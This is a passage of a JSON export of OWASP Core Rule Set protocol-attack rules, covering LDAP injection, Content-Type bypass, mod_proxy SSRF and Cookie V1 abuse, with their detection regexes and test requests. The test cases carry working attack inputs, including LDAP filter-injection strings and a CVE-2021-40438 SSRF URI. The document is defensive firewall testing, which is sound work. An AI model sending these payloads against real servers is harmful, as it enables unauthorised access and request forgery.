"act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 217, "act_quote": "quotes", "act_arg": "capec/1000/210/272/220/34", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 218, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 219, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 220, "act_quote": "quotes", "act_arg": "tx.http_violation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 221, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 203 } }, { "rule_id": "921200", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "^[^:\\(\\)\\&\\|\\!\\<\\>\\~]*\\)\\s*(?:\\((?:[^,\\(\\)\\=\\&\\|\\!\\<\\>\\~]+[><~]?=|\\s*[&!|]\\s*(?:\\)|\\()?\\s*)|\\)\\s*\\(\\s*[\\&\\|\\!]\\s*|[&!|]\\s*\\([^\\(\\)\\=\\&\\|\\!\\<\\>\\~]+[><~]?=[^:\\(\\)\\&\\|\\!\\<\\>\\~]*)", "negated": false } }, "transformations": [ "none", "htmlEntityDecode" ], "metadata": { "phase": "2", "message": "LDAP Injection Attack", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": "CRITICAL", "tags": [ "application-multi", "language-ldap", "platform-multi", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/152/248/136" ] }, "test_cases": [ { "description": "Testing for FP, this should not trigger", "test_id": 1, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" }, "expected": { "should_block": false, "rule_ids": [ 921200 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" } ] }, { "description": "Testing for FP, this should not trigger", "test_id": 2, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" }, "expected": { "should_block": false, "rule_ids": [ 921200 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" } ] }, { "description": "Testing for FP, this should not trigger", "test_id": 3, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" }, "expected": { "should_block": false, "rule_ids": [ 921200 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" } ] }, { "description": "Testing for rule, this should trigger", "test_id": 4, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=bar)(%26)" }, "expected": { "should_block": true, "rule_ids": [ 921200 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=bar)(%26)" } ] }, { "description": "Testing for rule, this should trigger", "test_id": 5, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=printer)(uid=*)" }, "expected": { "should_block": true, "rule_ids": [ 921200 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=printer)(uid=*)" } ] }, { "description": "Testing for rule, this should trigger", "test_id": 6, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=void)(objectClass=users))(%26(objectClass=void)" }, "expected": { "should_block": true, "rule_ids": [ 921200 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=void)(objectClass=users))(%26(objectClass=void)" } ] }, { "description": "Testing for rule, this should trigger", "test_id": 7, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=eb9adbd87d)!(sn=*" }, "expected": { "should_block": true, "rule_ids": [ 921200 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=eb9adbd87d)!(sn=*" } ] }, { "description": "Testing for rule, this should trigger", "test_id": 8, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=*)!(sn=*" }, "expected": { "should_block": true, "rule_ids": [ 921200 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=*)!(sn=*" } ] }, { "description": "Testing for rule, this should trigger", "test_id": 9, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=*)(uid=*))(|(uid=*" }, "expected": { "should_block": true, "rule_ids": [ 921200 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=*)(uid=*))(|(uid=*" } ] }, { "description": "Testing for rule, this should trigger", "test_id": 10, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=aaa*aaa)(cn>=bob)" }, "expected": { "should_block": true, "rule_ids": [ 921200 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=aaa*aaa)(cn>=bob)" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 237, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^[^:\\(\\)\\&\\|\\!\\<\\>\\~]*\\)\\s*(?:\\((?:[^,\\(\\)\\=\\&\\|\\!\\<\\>\\~]+[><~]?=|\\s*[&!|]\\s*(?:\\)|\\()?\\s*)|\\)\\s*\\(\\s*[\\&\\|\\!]\\s*|[&!|]\\s*\\([^\\(\\)\\=\\&\\|\\!\\<\\>\\~]+[><~]?=[^:\\(\\)\\&\\|\\!\\<\\>\\~]*)", "actions": [ { "act_name": "id", "lineno": 238, "act_quote": "no_quote", "act_arg": "921200", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 239, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 240, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 241, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 242, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 242, "act_quote": "no_quote", "act_arg": "htmlEntityDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 243, "act_quote": "quotes", "act_arg": "LDAP Injection Attack", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 244, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 245, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 246, "act_quote": "quotes", "act_arg": "language-ldap", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 247, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 248, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 249, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 250, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 251, "act_quote": "quotes", "act_arg": "capec/1000/152/248/136", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 252, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 253, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 254, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 237 } }, { "rule_id": "921421", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_HEADERS", "part": "Content-Type", "negated": false } ], "operator": { "type": "@rx", "argument": "^[^\\s\\x0b,;]+[\\s\\x0b,;].*?(?:application/(?:.+\\+)?json|(?:application/(?:soap\\+)?|text/)xml)", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "1", "message": "Content-Type header: Dangerous content type outside the mime type declaration", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/255/153" ] }, "test_cases": [ { "description": "Bypass targeting recommended rules (rule 200000)", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"application/json\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921421 ] }, "malicious_patterns": [] }, { "description": "Bypass targeting recommended rules (rule 200006)", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"application/vnd.mycompany.myapp.customer-v2+json\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921421 ] }, "malicious_patterns": [] }, { "description": "Bypass targeting recommended rules (rule 200001)", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"text/xml\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921421 ] }, "malicious_patterns": [] }, { "description": "Bypass targeting recommended rules (rule 200001)", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"application/xml\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921421 ] }, "malicious_patterns": [] }, { "description": "Bypass targeting recommended rules (rule 200001)", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/x-www-form-urlencoded;boundary=\"application/soap+xml\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921421 ] }, "malicious_patterns": [] }, { "description": "Negative test for 921421-1", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/json" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921421 ] }, "malicious_patterns": [] }, { "description": "Negative test for 921421-2", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/vnd.mycompany.myapp.customer-v2+json" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921421 ] }, "malicious_patterns": [] }, { "description": "Negative test for 921421-3", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "text/xml" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921421 ] }, "malicious_patterns": [] }, { "description": "Negative test for 921421-4", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/xml" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921421 ] }, "malicious_patterns": [] }, { "description": "Negative test for 921421-5", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/soap+xml" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921421 ] }, "malicious_patterns": [] }, { "description": "Negative test for rule 921421-6", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "text/html; charset=UTF-8" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921421 ] }, "malicious_patterns": [] }, { "description": "Negative test for rule 921421-7", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "multipart/form-data; boundary=something" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921421 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 269, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "Content-Type", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^[^\\s\\x0b,;]+[\\s\\x0b,;].*?(?:application/(?:.+\\+)?json|(?:application/(?:soap\\+)?|text/)xml)", "actions": [ { "act_name": "id", "lineno": 270, "act_quote": "no_quote", "act_arg": "921421", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 271, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 272, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 273, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 274, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 274, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 275, "act_quote": "quotes", "act_arg": "Content-Type header: Dangerous content type outside the mime type declaration", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 276, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 277, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 278, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 279, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 280, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 281, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 282, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 283, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 284, "act_quote": "quotes", "act_arg": "capec/1000/255/153", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 285, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 286, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 287, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 269 } }, { "rule_id": "921240", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_URI_RAW", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "unix:[^|]*\\|", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "lowercase" ], "metadata": { "phase": "1", "message": "mod_proxy attack attempt detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-apache", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/210/272/220/33" ] }, "test_cases": [ { "description": "Detect attacks against mod_proxy: CVE-2021-40438", "test_id": 1, "request": { "method": null, "uri": "/?unix:AAAAAAAAA|http://coreruleset.org/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921240 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "unix:AAAAAAAAA|http://coreruleset.org/" } ] }, { "description": "Detect attacks against mod_proxy: CVE-2021-40438, URI encoded", "test_id": 2, "request": { "method": null, "uri": "/?unix%3AAAAAAAAAA|http://coreruleset.org/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921240 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "unix%3AAAAAAAAAA|http://coreruleset.org/" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 296, "variables": [ { "variable": "REQUEST_URI_RAW", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "unix:[^|]*\\|", "actions": [ { "act_name": "id", "lineno": 297, "act_quote": "no_quote", "act_arg": "921240", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 298, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 299, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 300, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 301, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 301, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 301, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 302, "act_quote": "quotes", "act_arg": "mod_proxy attack attempt detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 303, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 304, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 305, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 306, "act_quote": "quotes", "act_arg": "platform-apache", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 307, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 308, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 309, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 310, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 311, "act_quote": "quotes", "act_arg": "capec/1000/210/272/220/33", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 312, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 313, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 314, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 296 } }, { "rule_id": "921250", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "/\\x22?\\x24Version/", "negated": false } ], "operator": { "type": "@streq", "argument": "1", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "1", "message": "Old Cookies V1 usage attempt detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/210/272/220/33" ] }, "test_cases": [ { "description": "Positive test: Detect if the cookie V1 is present in the request headers", "test_id": 1, "request": { "method": null, "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*", "Origin": "https://www.example.com", "Referer": "https://www.example.com/", "Cookie": "$Version=1; session=\\\"deadbeef; PHPSESSID=secret; dummy=qaz\\\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921250 ] }, "malicious_patterns": [] }, { "description": "Positive test: Detect if cookie V1 and also quoting is trying to be abused in the request headers", "test_id": 2, "request": { "method": null, "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*", "Origin": "https://www.example.com", "Referer": "https://www.example.com/", "Cookie": "$Version=1; session=\"deadbeef; PHPSESSID=secret; dummy=qaz\"" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921250 ] }, "malicious_patterns": [] }, { "description": "Negative test: do not match if Version is used as part of a cookie name", "test_id": 3, "request": { "method": null, "uri": "/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*", "Cookie": "MyVersion=1; PHPSESSID=secret" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921250 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 325, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "/\\x22?\\x24Version/", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@streq", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 326, "act_quote": "no_quote", "act_arg": "921250", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 327, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 328, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 329, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 330, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 330, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 331, "act_quote": "quotes", "act_arg": "Old Cookies V1 usage attempt detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 332, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 333, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 334, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 335, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 336, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 337, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { 